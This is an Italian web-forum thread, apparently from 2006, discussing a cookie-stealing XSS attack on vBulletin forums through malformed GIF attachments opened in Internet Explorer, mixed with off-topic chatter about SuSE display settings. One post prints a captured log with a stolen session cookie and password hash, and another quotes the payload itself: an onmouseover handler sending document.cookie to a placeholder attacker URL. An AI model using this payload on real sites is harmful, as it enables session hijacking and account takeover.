Exploit per Vbulletin 3.5.4 ?

[Sergio]

fantastici! Senti Sergio, dopo aver installato la Suse il desktop nn va a + di 640x480 e i caratteri sono piccolissimi... Pensi sia un problema dei driver della sk?

Se il monitor lo consente lo puoi configurare si se proprio non hai una scheda video stranissima, ma dovrebbero essere tutte compatibili, non in modalità accellerata, ma modalità normale si, guarda nello Yast, non ricordo esattamente ora, ma c'è un modulo per configurare il monitor proprio come in win.
Io avevo configurato i monitors dual head quando usavo solo Suse.

[jancarlo]

Ocio non sbattere gli occhi, 13 herz, davanti al monitor che vi prendono anche la retina e che con quella poi vi clonano il buco del cul*. Conviene sempre guardare il monitor nel lato superiore destro, tipo strabico, in questo modo vi vedono al massimo un quarto del DNA che non è nulla visto che il 99,99% siamo simili alle scimmie.

jancarlo

[Danny]

Ho la ATI X800GTO quindi nn è proprio stranissima

Cioè nello Yast nonostante cambi risoluzione resta sempre a 640... Domani controllo con + calma...

Poi mi pare strano che i caratteri si vedano in piccolissimo, quasi alcuni non si leggono da quanto son piccoli Consigli?

[Sergio]

Ocio non sbattere gli occhi, 13 herz, davanti al monitor che vi prendono anche la retina e che con quella poi vi clonano il buco del cul*. Conviene sempre guardare il monitor nel lato superiore destro, tipo strabico, in questo modo vi vedono al massimo un quarto del DNA che non è nulla visto che il 99,99% siamo simili alle scimmie.

jancarlo

Adesso ci mandi per posta un pò della droga che hai usato
Cheeee ?

[Sergio]

Rimandiamo ad un post nuovo qua siamo del tutto OT : http://www.vbulletin.it/showthread.php?p=3306#post3306

[Danny]

Adesso ci mandi per posta un pò della droga che hai usato
Cheeee ?

Rimandiamo ad un post nuovo qua siamo del tutto OT : http://www.vbulletin.it/showthread.php?p=3306#post3306

Quoto

[Sergio]

Di per sé allegare immagini non è pericoloso, perché vBulletin è abbastanza tutelato (prova allegare un *.gif). Il problema nasce però se il testo o la firma contiene immagini prelevati da altri siti, o loro collegamenti.

Più esattamente, i file *.gif e collegamenti a pagine statiche e dinamiche sono affetti da questo problema, quindi potrebbe diventare impossibile navigare senza essere continuamente spiati.

E infatti questo sta succedendo già da molto tempo in modo più o meno trasparente. Prendiamo ad esempio adwords di Google. Il meccanismo di Google offre una grossa privacy, ma alcune caratteristiche sono basate sulla manipolazione dei cookie tramite uno script java, che viene inviato a Google, mentre si va ad accedere una pagina, che prontamente ci suggerisce cosa comprare per prossimo

L'unico nostro grande vantaggio è, che questi servizi nascosti richiedono una potenza di calcolo al di fuori della portata economica di una qualunque azienda piccola-media-grande. Soltanto i Multinazionali e Governi si possono permettere tale lusso, e questi fanno uso abbondante di questa tecnologia, ve lo garantisco

Ecco cosa arriva tramite mail, per farvi capire la gravità della cosa:

Xss: Hacking Ip: 87.11.***.134 Cookie: bblastvisit=1133099136; bblastactivity=1133107002; bbuserid=1****; bbpassword=250aca696300c0a3927492cd674ab4b6; vbulletin_collapse; bbstyleid=1 Url: http://www.sito.it/dir/exploit.php porta usata: 80 remote port: 2325 Giorno & Ora : Wednesday, June 28, 2006, 4:25 pm

[edivad82]

Di per sé allegare immagini non è pericoloso, perché vBulletin è abbastanza tutelato (prova allegare un *.gif). Il problema nasce però se il testo o la firma contiene immagini prelevati da altri siti, o loro collegamenti.

Più esattamente, i file *.gif e collegamenti a pagine statiche e dinamiche sono affetti da questo problema, quindi potrebbe diventare impossibile navigare senza essere continuamente spiati.

non proprio...solo i file residenti sul dominio possono accedere ai cookie, per questo è necessario l'upload del file image.gif, altrimenti sarebbe bastato linkarlo da remoto... quindi allegati e forse avatar...

per il resto, mi sto documentando di più su questo...

[Sergio]

Esatto.

Quello che non ho capito se il cookies viene rilevato attraverso l'immagine allegata tramite il vBulletin, quelle inserite nel MySql per intenderci, non so se è da considerarsi un "click diretto"

[edivad82]

Esatto.

Quello che non ho capito se il cookies viene rilevato attraverso l'immagine allegata tramite il vBulletin, quelle inserite nel MySql per intenderci, non so se è da considerarsi un "click diretto"

allora...

non viene preso nulla dal server che ospita vbulletin... il bug è riferito a internet explorer, che anzichè vedere un fil .gif malformato, esegue il codice contenuto, di fatto residente sul server ospitante vbulletin, in quanto è un attach.

cosa c'è scritto li dentro? semplicemente richiama un file esterno che non fa altro che salvarsi il cookie del pc dell'utente che con il mouse passa sopra all'immagine, lo si vede da qui:

Codice:

<pre a='>' onmouseover='document.location="http://YOUR ADDRESS WEB.com/exploit.php?c="+document.cookie' b='</pre' >

più esattamente : exploit.php?c="+document.cookie
dove exploit.php è la pagina sul server di chi ci ha allegato l'immagine, c è la variabile passata a quella pagine e +document.cookie altro non è che il nostro bel cookie concatenato come stringa tramite il javascript, il risultato è far spedite il nostro cookie al server remoto.
ricostruendo il cookie posso accedere con i dati dell'utente.
Stando a vedere questo passaggio, non è un bug XSS specifico di vbulletin, ma potenzialmente qualsiasi sito che permetta l'upload di file ne è soggetto, quindi tutti i vbulletin, ma anche tutte le altre piattaforme forum, cms, fotogallery ecc...